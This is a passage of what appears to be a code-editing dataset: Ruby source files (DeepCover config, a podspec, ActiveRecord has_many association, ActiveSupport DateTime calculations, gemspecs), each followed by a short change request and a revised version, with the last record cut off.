  s.files         = `git ls-files`.split($/)
  s.executables   = s.files.grep(%r{^bin/}) { |f| File.basename(f) }
  s.test_files    = s.files.grep(%r{^(test|spec|features)/})
  s.require_paths = ["lib"]

  s.add_dependency "ltsv", "~> 0.1.0"
  s.add_development_dependency "bundler", "~> 1.3"
  s.add_development_dependency "rake"
end
|
# frozen_string_literal: true

module DeepCover
  # Runtime configuration for DeepCover. Options live in a plain Hash and are
  # read/written through generated accessor methods so that an optional
  # notifier object can react to changes.
  class Config
    # Sentinel distinguishing "no argument given" from an explicit nil.
    NOT_SPECIFIED = Object.new

    def initialize(notify = nil)
      @notify = nil # keep notifications off while defaults are applied
      @options = {}
      set(**DEFAULTS)
      @notify = notify
    end

    def to_hash
      @options.dup
    end
    alias_method :to_h, :to_hash

    # Hash variant with paths/globs and directories expanded, suitable for
    # serialization across processes.
    def to_hash_for_serialize
      hash = to_hash
      # TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
      hash[:paths] = DeepCover.lookup_globs
      hash[:output] = hash[:output] ? File.expand_path(hash[:output]) : hash[:output]
      hash[:cache_directory] = File.expand_path(hash[:cache_directory])
      hash
    end

    # Restores options produced by #to_hash_for_serialize.
    def load_hash_for_serialize(hash)
      @options.merge!(hash)
      hash.each_key { |option| @notify.config_changed(option) } if @notify
      # This was already transformed, it should all be absolute paths / globs, avoid doing it for nothing by setting it right away
      # TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
      DeepCover.instance_variable_set(:@lookup_globs, hash[:paths])
    end

    # Marks the given filter keywords (or a custom block filter) as ignored.
    # Returns the resulting list of ignored filters.
    def ignore_uncovered(*keywords, &block)
      if block
        raise ArgumentError, "wrong number of arguments (given #{keywords.size}, expected 0..1)" if keywords.size > 1
        keywords << Node.unique_filter if keywords.empty?
        Node.create_filter(keywords.first, &block)
        AttributeAccessors.define_accessor(FILTER_NAME[keywords.first])
      end
      unless keywords.empty?
        keywords = check_uncovered(keywords)
        # BUG FIX: `set` only accepts keyword arguments (**options); passing
        # the Hash positionally raises ArgumentError on Ruby 3+. Splat it.
        set(**keywords.to_h { |kind| [FILTER_NAME[kind], true] })
      end
      Config.options_to_ignored(**@options)
    end

    # Re-enables detection for the given filter keywords; returns the filters
    # that are still detected (not ignored).
    def detect_uncovered(*keywords)
      raise ArgumentError, 'No block is accepted' if block_given?
      unless keywords.empty?
        keywords = check_uncovered(keywords)
        # BUG FIX: splat into keyword arguments, same as in #ignore_uncovered.
        set(**keywords.to_h { |kind| [FILTER_NAME[kind], false] })
      end
      OPTIONALLY_COVERED - Config.options_to_ignored(**@options)
    end

    # Generates combined reader/writer methods: `conf.opt` reads,
    # `conf.opt(value)` writes (and notifies).
    module AttributeAccessors
      def self.define_accessor(attr)
        define_method(attr) do |arg = NOT_SPECIFIED|
          return @options[attr] if arg == NOT_SPECIFIED
          change(attr, arg)
        end
      end

      %i[paths tracker_global reporter output cache_directory allow_partial]
        .concat(OPTIONALLY_COVERED.map { |filter| FILTER_NAME[filter] })
        .each { |attr| define_accessor(attr) }
    end
    include AttributeAccessors

    # Accepts a single path or an array; always stores a fresh Array.
    def paths(paths = NOT_SPECIFIED)
      paths = Array(paths).dup unless paths == NOT_SPECIFIED
      super
    end

    # Reader returns the expanded path; writer stores as given.
    def cache_directory(cache_directory = NOT_SPECIFIED)
      return File.expand_path(super) if cache_directory == NOT_SPECIFIED
      super
    end

    # Restores every option to its default, notifying on actual changes.
    def reset
      DEFAULTS.each do |key, value|
        change(key, value)
      end
      self
    end

    def [](opt)
      public_send(opt)
    end

    def []=(opt, value)
      public_send(opt, value)
    end

    # Bulk assignment; each option goes through its accessor (and notifier).
    def set(**options)
      options.each do |key, value|
        self[key] = value
      end
      self
    end

    # Filters currently marked as ignored, derived from an options hash.
    def self.options_to_ignored(**options)
      OPTIONALLY_COVERED
        .select { |filter| options[FILTER_NAME[filter]] }
    end

    private

    # Validates filter keywords; raises ArgumentError on unknown ones.
    def check_uncovered(keywords)
      keywords = keywords.first if keywords.size == 1 && keywords.first.is_a?(Array)
      unknown = keywords - OPTIONALLY_COVERED
      raise ArgumentError, "unknown options: #{unknown.join(', ')}" unless unknown.empty?
      keywords
    end

    # Stores a (frozen) value and notifies only when it actually changed.
    def change(option, value)
      if @options[option] != value
        @options[option] = value.freeze
        @notify.config_changed(option) if @notify.respond_to? :config_changed
      end
      self
    end
  end
end
Pass options to `set` as keyword parameters (splat the hash with `**`), as required by Ruby 3's separation of positional and keyword arguments.
# frozen_string_literal: true

module DeepCover
  # Runtime configuration for DeepCover. Options live in a plain Hash and are
  # read/written through generated accessor methods so that an optional
  # notifier object can react to changes.
  class Config
    # Sentinel distinguishing "no argument given" from an explicit nil.
    NOT_SPECIFIED = Object.new

    def initialize(notify = nil)
      @notify = nil # keep notifications off while defaults are applied
      @options = {}
      set(**DEFAULTS)
      @notify = notify
    end

    def to_hash
      @options.dup
    end
    alias_method :to_h, :to_hash

    # Hash variant with paths/globs and directories expanded, suitable for
    # serialization across processes.
    def to_hash_for_serialize
      hash = to_hash
      # TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
      hash[:paths] = DeepCover.lookup_globs
      hash[:output] = hash[:output] ? File.expand_path(hash[:output]) : hash[:output]
      hash[:cache_directory] = File.expand_path(hash[:cache_directory])
      hash
    end

    # Restores options produced by #to_hash_for_serialize.
    def load_hash_for_serialize(hash)
      @options.merge!(hash)
      hash.each_key { |option| @notify.config_changed(option) } if @notify
      # This was already transformed, it should all be absolute paths / globs, avoid doing it for nothing by setting it right away
      # TODO: (Max) I don't like mixup of configs being partly on DeepCover and Config like that...
      DeepCover.instance_variable_set(:@lookup_globs, hash[:paths])
    end

    # Marks the given filter keywords (or a custom block filter) as ignored.
    # Returns the resulting list of ignored filters.
    def ignore_uncovered(*keywords, &block)
      if block
        raise ArgumentError, "wrong number of arguments (given #{keywords.size}, expected 0..1)" if keywords.size > 1
        keywords << Node.unique_filter if keywords.empty?
        Node.create_filter(keywords.first, &block)
        AttributeAccessors.define_accessor(FILTER_NAME[keywords.first])
      end
      unless keywords.empty?
        keywords = check_uncovered(keywords)
        set(**keywords.to_h { |kind| [FILTER_NAME[kind], true] })
      end
      Config.options_to_ignored(**@options)
    end

    # Re-enables detection for the given filter keywords; returns the filters
    # that are still detected (not ignored).
    def detect_uncovered(*keywords)
      raise ArgumentError, 'No block is accepted' if block_given?
      unless keywords.empty?
        keywords = check_uncovered(keywords)
        # BUG FIX: `set` only accepts keyword arguments (**options); passing
        # the Hash positionally raises ArgumentError on Ruby 3+. Splat it,
        # exactly as #ignore_uncovered already does.
        set(**keywords.to_h { |kind| [FILTER_NAME[kind], false] })
      end
      OPTIONALLY_COVERED - Config.options_to_ignored(**@options)
    end

    # Generates combined reader/writer methods: `conf.opt` reads,
    # `conf.opt(value)` writes (and notifies).
    module AttributeAccessors
      def self.define_accessor(attr)
        define_method(attr) do |arg = NOT_SPECIFIED|
          return @options[attr] if arg == NOT_SPECIFIED
          change(attr, arg)
        end
      end

      %i[paths tracker_global reporter output cache_directory allow_partial]
        .concat(OPTIONALLY_COVERED.map { |filter| FILTER_NAME[filter] })
        .each { |attr| define_accessor(attr) }
    end
    include AttributeAccessors

    # Accepts a single path or an array; always stores a fresh Array.
    def paths(paths = NOT_SPECIFIED)
      paths = Array(paths).dup unless paths == NOT_SPECIFIED
      super
    end

    # Reader returns the expanded path; writer stores as given.
    def cache_directory(cache_directory = NOT_SPECIFIED)
      return File.expand_path(super) if cache_directory == NOT_SPECIFIED
      super
    end

    # Restores every option to its default, notifying on actual changes.
    def reset
      DEFAULTS.each do |key, value|
        change(key, value)
      end
      self
    end

    def [](opt)
      public_send(opt)
    end

    def []=(opt, value)
      public_send(opt, value)
    end

    # Bulk assignment; each option goes through its accessor (and notifier).
    def set(**options)
      options.each do |key, value|
        self[key] = value
      end
      self
    end

    # Filters currently marked as ignored, derived from an options hash.
    def self.options_to_ignored(**options)
      OPTIONALLY_COVERED
        .select { |filter| options[FILTER_NAME[filter]] }
    end

    private

    # Validates filter keywords; raises ArgumentError on unknown ones.
    def check_uncovered(keywords)
      keywords = keywords.first if keywords.size == 1 && keywords.first.is_a?(Array)
      unknown = keywords - OPTIONALLY_COVERED
      raise ArgumentError, "unknown options: #{unknown.join(', ')}" unless unknown.empty?
      keywords
    end

    # Stores a (frozen) value and notifies only when it actually changed.
    def change(option, value)
      if @options[option] != value
        @options[option] = value.freeze
        @notify.config_changed(option) if @notify.respond_to? :config_changed
      end
      self
    end
  end
end
|
#
# Be sure to run `pod lib lint NAME.podspec' to ensure this is a
# valid spec and remove all comments before submitting the spec.
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
# NOTE(review): this spec still carries the pod-template placeholders
# (EXAMPLE homepage/source URLs, template summary) -- fill them in before
# publishing.
Pod::Spec.new do |s|
  s.name             = "expanding-tableview"
  s.version          = "0.1.0"
  s.summary          = "A short description of expanding-tableview."
  s.description      = <<-DESC
An optional longer description of expanding-tableview
* Markdown format.
* Don't worry about the indent, we strip it!
                       DESC
  s.homepage         = "http://EXAMPLE/NAME"
  s.screenshots      = "www.example.com/screenshots_1", "www.example.com/screenshots_2"
  s.license          = 'MIT'
  s.author           = { "Ike Ellis" => "isaac.c.ellis@gmail.com" }
  s.source           = { :git => "http://EXAMPLE/NAME.git", :tag => s.version.to_s }
  s.social_media_url = 'https://twitter.com/EXAMPLE'

  s.platform         = :ios, '7.0'
  s.ios.deployment_target = '7.0'
  # s.osx.deployment_target = '10.7'
  s.requires_arc     = true

  s.source_files     = 'Classes'
  s.resources        = 'Assets/*.png'
  s.ios.exclude_files = 'Classes/osx'
  s.osx.exclude_files = 'Classes/ios'
  # s.public_header_files = 'Classes/**/*.h'
  # s.frameworks = 'SomeFramework', 'AnotherFramework'
  # s.dependency 'JSONKit', '~> 1.4'
end
expanding-tableview.podspec
#
# Be sure to run `pod lib lint NAME.podspec' to ensure this is a
# valid spec and remove all comments before submitting the spec.
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
# NOTE(review): homepage/screenshots/social_media_url still carry pod-template
# placeholders, and :source has no :tag -- pods are normally pinned to a tag.
Pod::Spec.new do |s|
  s.name             = "expanding-tableview"
  s.version          = "0.1.0"
  s.summary          = "A short description of expanding-tableview."
  s.description      = <<-DESC
An optional longer description of expanding-tableview
* Markdown format.
* Don't worry about the indent, we strip it!
                       DESC
  s.homepage         = "http://EXAMPLE/NAME"
  s.screenshots      = "www.example.com/screenshots_1", "www.example.com/screenshots_2"
  s.license          = 'MIT'
  s.author           = { "Ike Ellis" => "isaac.c.ellis@gmail.com" }
  s.source           = { :git => "https://github.com/iellis/expanding-tableview.git" }
  s.social_media_url = 'https://twitter.com/EXAMPLE'

  s.platform         = :ios, '7.0'
  s.ios.deployment_target = '7.0'
  # s.osx.deployment_target = '10.7'
  s.requires_arc     = true

  # glob covers Objective-C headers and implementation files
  s.source_files     = 'Classes/**/*.{h,m}'
  s.resources        = 'Assets/*.png'
  s.ios.exclude_files = 'Classes/osx'
  s.osx.exclude_files = 'Classes/ios'
  # s.public_header_files = 'Classes/**/*.h'
  # s.frameworks = 'SomeFramework', 'AnotherFramework'
  # s.dependency 'JSONKit', '~> 1.4'
end
|
module ActiveRecord
  # = Active Record Has Many Association
  module Associations
    # This is the proxy that handles a has many association.
    #
    # If the association has a <tt>:through</tt> option further specialization
    # is provided by its child HasManyThroughAssociation.
    class HasManyAssociation < AssociationCollection #:nodoc:
      def initialize(owner, reflection)
        @finder_sql = nil
        super
      end

      protected

      # Quoted primary-key value of the owner, honoring a custom
      # :primary_key option on the reflection.
      def owner_quoted_id
        if @reflection.options[:primary_key]
          quote_value(@owner.send(@reflection.options[:primary_key]))
        else
          @owner.quoted_id
        end
      end

      # Returns the number of records in this collection.
      #
      # If the association has a counter cache it gets that value. Otherwise
      # it will attempt to do a count via SQL, bounded to <tt>:limit</tt> if
      # there's one. Some configuration options like :group make it impossible
      # to do an SQL count, in those cases the array count will be used.
      #
      # That does not depend on whether the collection has already been loaded
      # or not. The +size+ method is the one that takes the loaded flag into
      # account and delegates to +count_records+ if needed.
      #
      # If the collection is empty the target is set to an empty array and
      # the loaded flag is set to true as well.
      def count_records
        count = if has_cached_counter?
          @owner.send(:read_attribute, cached_counter_attribute_name)
        elsif @reflection.options[:counter_sql]
          @reflection.klass.count_by_sql(@counter_sql)
        else
          @reflection.klass.count(:conditions => @counter_sql, :include => @reflection.options[:include])
        end
        # If there's nothing in the database and @target has no new records
        # we are certain the current target is an empty array. This is a
        # documented side-effect of the method that may avoid an extra SELECT.
        @target ||= [] and loaded if count == 0
        if @reflection.options[:limit]
          count = [ @reflection.options[:limit], count ].min
        end
        return count
      end

      # True when the owner carries a "#{name}_count" counter-cache column.
      def has_cached_counter?
        @owner.attribute_present?(cached_counter_attribute_name)
      end

      def cached_counter_attribute_name
        "#{@reflection.name}_count"
      end

      # Links +record+ to the owner and saves it (save! when +force+).
      def insert_record(record, force = false, validate = true)
        set_belongs_to_association_for(record)
        force ? record.save! : record.save(:validate => validate)
      end

      # Deletes the records according to the <tt>:dependent</tt> option.
      def delete_records(records)
        case @reflection.options[:dependent]
        when :destroy
          records.each { |r| r.destroy }
        when :delete_all
          @reflection.klass.delete(records.map { |record| record.id })
        else
          # default: nullify the foreign key instead of deleting rows.
          # BUG FIX: Arel::Predicates::In is not part of Arel's public API
          # anymore; use the attribute predicate method #in instead.
          relation = Arel::Table.new(@reflection.table_name)
          relation.where(relation[@reflection.primary_key_name].eq(@owner.id).
            and(relation[@reflection.klass.primary_key].in(records.map { |r| r.id }))
          ).update(relation[@reflection.primary_key_name] => nil)
          @owner.class.update_counters(@owner.id, cached_counter_attribute_name => -records.size) if has_cached_counter?
        end
      end

      def target_obsolete?
        false
      end

      # Builds @finder_sql (and the counter SQL) from the reflection options:
      # a custom :finder_sql, a polymorphic :as join, or the plain FK match.
      def construct_sql
        case
        when @reflection.options[:finder_sql]
          @finder_sql = interpolate_sql(@reflection.options[:finder_sql])
        when @reflection.options[:as]
          @finder_sql =
            "#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_id = #{owner_quoted_id} AND " +
            "#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_type = #{@owner.class.quote_value(@owner.class.base_class.name.to_s)}"
          @finder_sql << " AND (#{conditions})" if conditions
        else
          @finder_sql = "#{@reflection.quoted_table_name}.#{@reflection.primary_key_name} = #{owner_quoted_id}"
          @finder_sql << " AND (#{conditions})" if conditions
        end
        construct_counter_sql
      end

      # Scope applied to finds/creates through this association.
      def construct_scope
        create_scoping = {}
        set_belongs_to_association_for(create_scoping)
        {
          :find => { :conditions => @finder_sql,
                     :readonly => false,
                     :order => @reflection.options[:order],
                     :limit => @reflection.options[:limit],
                     :include => @reflection.options[:include]},
          :create => create_scoping
        }
      end

      def we_can_set_the_inverse_on_this?(record)
        inverse = @reflection.inverse_of
        return !inverse.nil?
      end
    end
  end
end
Remove references to removed Arel constants: replace `Arel::Predicates::In.new(attr, ids)` with the attribute predicate `attr.in(ids)`.
module ActiveRecord
  # = Active Record Has Many Association
  module Associations
    # This is the proxy that handles a has many association.
    #
    # If the association has a <tt>:through</tt> option further specialization
    # is provided by its child HasManyThroughAssociation.
    class HasManyAssociation < AssociationCollection #:nodoc:
      def initialize(owner, reflection)
        @finder_sql = nil
        super
      end

      protected

      # Quoted primary-key value of the owner, honoring a custom
      # :primary_key option on the reflection.
      def owner_quoted_id
        if @reflection.options[:primary_key]
          quote_value(@owner.send(@reflection.options[:primary_key]))
        else
          @owner.quoted_id
        end
      end

      # Returns the number of records in this collection.
      #
      # If the association has a counter cache it gets that value. Otherwise
      # it will attempt to do a count via SQL, bounded to <tt>:limit</tt> if
      # there's one. Some configuration options like :group make it impossible
      # to do an SQL count, in those cases the array count will be used.
      #
      # That does not depend on whether the collection has already been loaded
      # or not. The +size+ method is the one that takes the loaded flag into
      # account and delegates to +count_records+ if needed.
      #
      # If the collection is empty the target is set to an empty array and
      # the loaded flag is set to true as well.
      def count_records
        count = if has_cached_counter?
          @owner.send(:read_attribute, cached_counter_attribute_name)
        elsif @reflection.options[:counter_sql]
          @reflection.klass.count_by_sql(@counter_sql)
        else
          @reflection.klass.count(:conditions => @counter_sql, :include => @reflection.options[:include])
        end
        # If there's nothing in the database and @target has no new records
        # we are certain the current target is an empty array. This is a
        # documented side-effect of the method that may avoid an extra SELECT.
        @target ||= [] and loaded if count == 0
        if @reflection.options[:limit]
          count = [ @reflection.options[:limit], count ].min
        end
        return count
      end

      # True when the owner carries a "#{name}_count" counter-cache column.
      def has_cached_counter?
        @owner.attribute_present?(cached_counter_attribute_name)
      end

      def cached_counter_attribute_name
        "#{@reflection.name}_count"
      end

      # Links +record+ to the owner and saves it (save! when +force+).
      def insert_record(record, force = false, validate = true)
        set_belongs_to_association_for(record)
        force ? record.save! : record.save(:validate => validate)
      end

      # Deletes the records according to the <tt>:dependent</tt> option.
      # Default (no :destroy/:delete_all) nullifies the foreign key via Arel
      # and keeps the counter cache in sync.
      def delete_records(records)
        case @reflection.options[:dependent]
        when :destroy
          records.each { |r| r.destroy }
        when :delete_all
          @reflection.klass.delete(records.map { |record| record.id })
        else
          relation = Arel::Table.new(@reflection.table_name)
          relation.where(relation[@reflection.primary_key_name].eq(@owner.id).
            and(relation[@reflection.klass.primary_key].in(records.map { |r| r.id }))
          ).update(relation[@reflection.primary_key_name] => nil)
          @owner.class.update_counters(@owner.id, cached_counter_attribute_name => -records.size) if has_cached_counter?
        end
      end

      def target_obsolete?
        false
      end

      # Builds @finder_sql (and the counter SQL) from the reflection options:
      # a custom :finder_sql, a polymorphic :as join, or the plain FK match.
      def construct_sql
        case
        when @reflection.options[:finder_sql]
          @finder_sql = interpolate_sql(@reflection.options[:finder_sql])
        when @reflection.options[:as]
          @finder_sql =
            "#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_id = #{owner_quoted_id} AND " +
            "#{@reflection.quoted_table_name}.#{@reflection.options[:as]}_type = #{@owner.class.quote_value(@owner.class.base_class.name.to_s)}"
          @finder_sql << " AND (#{conditions})" if conditions
        else
          @finder_sql = "#{@reflection.quoted_table_name}.#{@reflection.primary_key_name} = #{owner_quoted_id}"
          @finder_sql << " AND (#{conditions})" if conditions
        end
        construct_counter_sql
      end

      # Scope applied to finds/creates through this association.
      def construct_scope
        create_scoping = {}
        set_belongs_to_association_for(create_scoping)
        {
          :find => { :conditions => @finder_sql,
                     :readonly => false,
                     :order => @reflection.options[:order],
                     :limit => @reflection.options[:limit],
                     :include => @reflection.options[:include]},
          :create => create_scoping
        }
      end

      def we_can_set_the_inverse_on_this?(record)
        inverse = @reflection.inverse_of
        return !inverse.nil?
      end
    end
  end
end
|
# NOTE(review): compare_with_coercion below calls acts_like?, which is defined
# in active_support/core_ext/object/acts_like — confirm a caller requires it,
# otherwise comparisons against non-date objects raise NoMethodError.
require 'rational' unless RUBY_VERSION >= '1.9.2'

# Calculation and comparison extensions for the core DateTime class.
class DateTime
  class << self
    # DateTimes aren't aware of DST rules, so use a consistent non-DST offset when creating a DateTime with an offset in the local zone
    def local_offset
      # 2007-01-01 is safely outside DST in either hemisphere's summer shift;
      # result is a Rational fraction of a day.
      ::Time.local(2007).utc_offset.to_r / 86400
    end

    # Returns the current DateTime, honoring Time.zone when a default zone is configured.
    def current
      ::Time.zone_default ? ::Time.zone.now.to_datetime : ::Time.now.to_datetime
    end
  end

  # Tells whether the DateTime object's datetime lies in the past
  def past?
    self < ::DateTime.current
  end

  # Tells whether the DateTime object's datetime lies in the future
  def future?
    self > ::DateTime.current
  end

  # Seconds since midnight: DateTime.now.seconds_since_midnight
  def seconds_since_midnight
    sec + (min * 60) + (hour * 3600)
  end

  # Returns a new DateTime where one or more of the elements have been changed according to the +options+ parameter. The time options
  # (hour, minute, sec) reset cascadingly, so if only the hour is passed, then minute and sec is set to 0. If the hour and
  # minute is passed, then sec is set to 0.
  def change(options)
    ::DateTime.civil(
      options[:year] || year,
      options[:month] || month,
      options[:day] || day,
      options[:hour] || hour,
      options[:min] || (options[:hour] ? 0 : min),
      options[:sec] || ((options[:hour] || options[:min]) ? 0 : sec),
      options[:offset] || offset,
      options[:start] || start
    )
  end

  # Uses Date to provide precise Time calculations for years, months, and days.
  # The +options+ parameter takes a hash with any of these keys: <tt>:years</tt>,
  # <tt>:months</tt>, <tt>:weeks</tt>, <tt>:days</tt>, <tt>:hours</tt>,
  # <tt>:minutes</tt>, <tt>:seconds</tt>.
  def advance(options)
    # Calendar-aware fields (years/months/weeks/days) first via Date#advance,
    # then plain clock seconds on top.
    d = to_date.advance(options)
    datetime_advanced_by_date = change(:year => d.year, :month => d.month, :day => d.day)
    seconds_to_advance = (options[:seconds] || 0) + (options[:minutes] || 0) * 60 + (options[:hours] || 0) * 3600
    seconds_to_advance == 0 ? datetime_advanced_by_date : datetime_advanced_by_date.since(seconds_to_advance)
  end

  # Returns a new DateTime representing the time a number of seconds ago
  # Do not use this method in combination with x.months, use months_ago instead!
  def ago(seconds)
    since(-seconds)
  end

  # Returns a new DateTime representing the time a number of seconds since the instance time
  # Do not use this method in combination with x.months, use months_since instead!
  def since(seconds)
    # DateTime arithmetic is in fractional days: 86400 seconds per day.
    self + Rational(seconds.round, 86400)
  end
  alias :in :since

  # Returns a new DateTime representing the start of the day (0:00)
  def beginning_of_day
    change(:hour => 0)
  end
  alias :midnight :beginning_of_day
  alias :at_midnight :beginning_of_day
  alias :at_beginning_of_day :beginning_of_day

  # Returns a new DateTime representing the end of the day (23:59:59)
  def end_of_day
    change(:hour => 23, :min => 59, :sec => 59)
  end

  # Adjusts DateTime to UTC by adding its offset value; offset is set to 0
  #
  # Example:
  #
  #   DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24))     # => Mon, 21 Feb 2005 10:11:12 -0600
  #   DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)).utc # => Mon, 21 Feb 2005 16:11:12 +0000
  def utc
    new_offset(0)
  end
  alias_method :getutc, :utc

  # Returns true if offset == 0
  def utc?
    offset == 0
  end

  # Returns the offset value in seconds
  def utc_offset
    (offset * 86400).to_i
  end

  # Layers additional behavior on DateTime#<=> so that Time and ActiveSupport::TimeWithZone instances can be compared with a DateTime
  def compare_with_coercion(other)
    other = other.comparable_time if other.respond_to?(:comparable_time)
    other = other.to_datetime unless other.acts_like?(:date)
    compare_without_coercion(other)
  end
  # Order matters: capture the original <=> before re-aliasing <=> to the
  # coercing version.
  alias_method :compare_without_coercion, :<=>
  alias_method :<=>, :compare_with_coercion
end
date_time/calculations.rb needs to require active_support/core_ext/object/acts_like because it uses acts_like?
require 'rational' unless RUBY_VERSION >= '1.9.2'
# acts_like? (used by compare_with_coercion below) lives in this core_ext.
require 'active_support/core_ext/object/acts_like'

# Calculation and comparison extensions for the core DateTime class.
class DateTime
  class << self
    # DateTimes aren't aware of DST rules, so use a consistent non-DST offset when creating a DateTime with an offset in the local zone
    def local_offset
      # 2007-01-01 is safely outside DST in either hemisphere's summer shift;
      # result is a Rational fraction of a day.
      ::Time.local(2007).utc_offset.to_r / 86400
    end

    # Returns the current DateTime, honoring Time.zone when a default zone is configured.
    def current
      ::Time.zone_default ? ::Time.zone.now.to_datetime : ::Time.now.to_datetime
    end
  end

  # Tells whether the DateTime object's datetime lies in the past
  def past?
    self < ::DateTime.current
  end

  # Tells whether the DateTime object's datetime lies in the future
  def future?
    self > ::DateTime.current
  end

  # Seconds since midnight: DateTime.now.seconds_since_midnight
  def seconds_since_midnight
    sec + (min * 60) + (hour * 3600)
  end

  # Returns a new DateTime where one or more of the elements have been changed according to the +options+ parameter. The time options
  # (hour, minute, sec) reset cascadingly, so if only the hour is passed, then minute and sec is set to 0. If the hour and
  # minute is passed, then sec is set to 0.
  def change(options)
    ::DateTime.civil(
      options[:year] || year,
      options[:month] || month,
      options[:day] || day,
      options[:hour] || hour,
      options[:min] || (options[:hour] ? 0 : min),
      options[:sec] || ((options[:hour] || options[:min]) ? 0 : sec),
      options[:offset] || offset,
      options[:start] || start
    )
  end

  # Uses Date to provide precise Time calculations for years, months, and days.
  # The +options+ parameter takes a hash with any of these keys: <tt>:years</tt>,
  # <tt>:months</tt>, <tt>:weeks</tt>, <tt>:days</tt>, <tt>:hours</tt>,
  # <tt>:minutes</tt>, <tt>:seconds</tt>.
  def advance(options)
    # Calendar-aware fields (years/months/weeks/days) first via Date#advance,
    # then plain clock seconds on top.
    d = to_date.advance(options)
    datetime_advanced_by_date = change(:year => d.year, :month => d.month, :day => d.day)
    seconds_to_advance = (options[:seconds] || 0) + (options[:minutes] || 0) * 60 + (options[:hours] || 0) * 3600
    seconds_to_advance == 0 ? datetime_advanced_by_date : datetime_advanced_by_date.since(seconds_to_advance)
  end

  # Returns a new DateTime representing the time a number of seconds ago
  # Do not use this method in combination with x.months, use months_ago instead!
  def ago(seconds)
    since(-seconds)
  end

  # Returns a new DateTime representing the time a number of seconds since the instance time
  # Do not use this method in combination with x.months, use months_since instead!
  def since(seconds)
    # DateTime arithmetic is in fractional days: 86400 seconds per day.
    self + Rational(seconds.round, 86400)
  end
  alias :in :since

  # Returns a new DateTime representing the start of the day (0:00)
  def beginning_of_day
    change(:hour => 0)
  end
  alias :midnight :beginning_of_day
  alias :at_midnight :beginning_of_day
  alias :at_beginning_of_day :beginning_of_day

  # Returns a new DateTime representing the end of the day (23:59:59)
  def end_of_day
    change(:hour => 23, :min => 59, :sec => 59)
  end

  # Adjusts DateTime to UTC by adding its offset value; offset is set to 0
  #
  # Example:
  #
  #   DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24))     # => Mon, 21 Feb 2005 10:11:12 -0600
  #   DateTime.civil(2005, 2, 21, 10, 11, 12, Rational(-6, 24)).utc # => Mon, 21 Feb 2005 16:11:12 +0000
  def utc
    new_offset(0)
  end
  alias_method :getutc, :utc

  # Returns true if offset == 0
  def utc?
    offset == 0
  end

  # Returns the offset value in seconds
  def utc_offset
    (offset * 86400).to_i
  end

  # Layers additional behavior on DateTime#<=> so that Time and ActiveSupport::TimeWithZone instances can be compared with a DateTime
  def compare_with_coercion(other)
    other = other.comparable_time if other.respond_to?(:comparable_time)
    other = other.to_datetime unless other.acts_like?(:date)
    compare_without_coercion(other)
  end
  # Order matters: capture the original <=> before re-aliasing <=> to the
  # coercing version.
  alias_method :compare_without_coercion, :<=>
  alias_method :<=>, :compare_with_coercion
end
|
# coding: utf-8
# Gem packaging metadata for Caseadilla.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'caseadilla/version'

Gem::Specification.new do |spec|
  spec.name          = "caseadilla"
  spec.version       = Caseadilla::VERSION
  spec.authors       = ["Xavier Bick"]
  spec.email         = ["fxb9500@gmail.com"]
  spec.description   = "Caseadilla is a CMS for Rails based on Casein and Comfortable Mexican Sofa. It is designed to allow you to easily fit the CMS to your app, not the other way around. By default, Caseadilla installs with Devise for authentication and Declarative Authorization, however it can be installed without either if you want to use an existing auth system."
  spec.summary       = "A powerful yet unobtrusive CMS and data management system for Rails."
  spec.homepage      = "http://www.xavierbick.com"
  spec.license       = "MIT"

  # Fix: a bare "2.0.0" pins exactly Ruby 2.0.0; the gem should accept any
  # Ruby from 2.0.0 onwards.
  spec.required_ruby_version = ">= 2.0.0"

  spec.files         = `git ls-files`.split($/)
  spec.executables   = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
  spec.test_files    = spec.files.grep(%r{^(test|spec|features)/})
  spec.require_paths = ["lib"]

  spec.add_development_dependency "bundler", "~> 1.3"
  spec.add_development_dependency "rake", "> 0"

  # Legacy RubyGems compatibility: use add_runtime_dependency when supported,
  # otherwise fall back to add_dependency.
  if spec.respond_to? :specification_version then
    spec.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      spec.add_runtime_dependency(%q<will_paginate>, ["~> 3.0"])
      spec.add_runtime_dependency(%q<devise>, ["~> 3.2"])
      spec.add_runtime_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
      spec.add_runtime_dependency(%q<scrypt>, ["~> 1.2"])
      spec.add_runtime_dependency(%q<jquery-rails>, ["> 0"])
    else
      spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
      spec.add_dependency(%q<devise>, ["~> 3.2"])
      spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
      # Consistency fix: every other branch constrains scrypt to "~> 1.2",
      # this one said "~> 1.2.1" — align them.
      spec.add_dependency(%q<scrypt>, ["~> 1.2"])
      spec.add_dependency(%q<jquery-rails>, ["> 0"])
    end
  else
    spec.add_dependency(%q<will_paginate>, ["~> 3.0"])
    spec.add_dependency(%q<devise>, ["~> 3.2"])
    spec.add_dependency(%q<zeiv-declarative_authorization>, [">= 1.0.0.pre"])
    spec.add_dependency(%q<scrypt>, ["~> 1.2"])
    spec.add_dependency(%q<jquery-rails>, ["> 0"])
  end
end
Change the required Ruby version to 2.0.0 or greater
# coding: utf-8
# Gem packaging metadata for Caseadilla.
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'caseadilla/version'

Gem::Specification.new do |spec|
  spec.name          = "caseadilla"
  spec.version       = Caseadilla::VERSION
  spec.authors       = ["Xavier Bick"]
  spec.email         = ["fxb9500@gmail.com"]
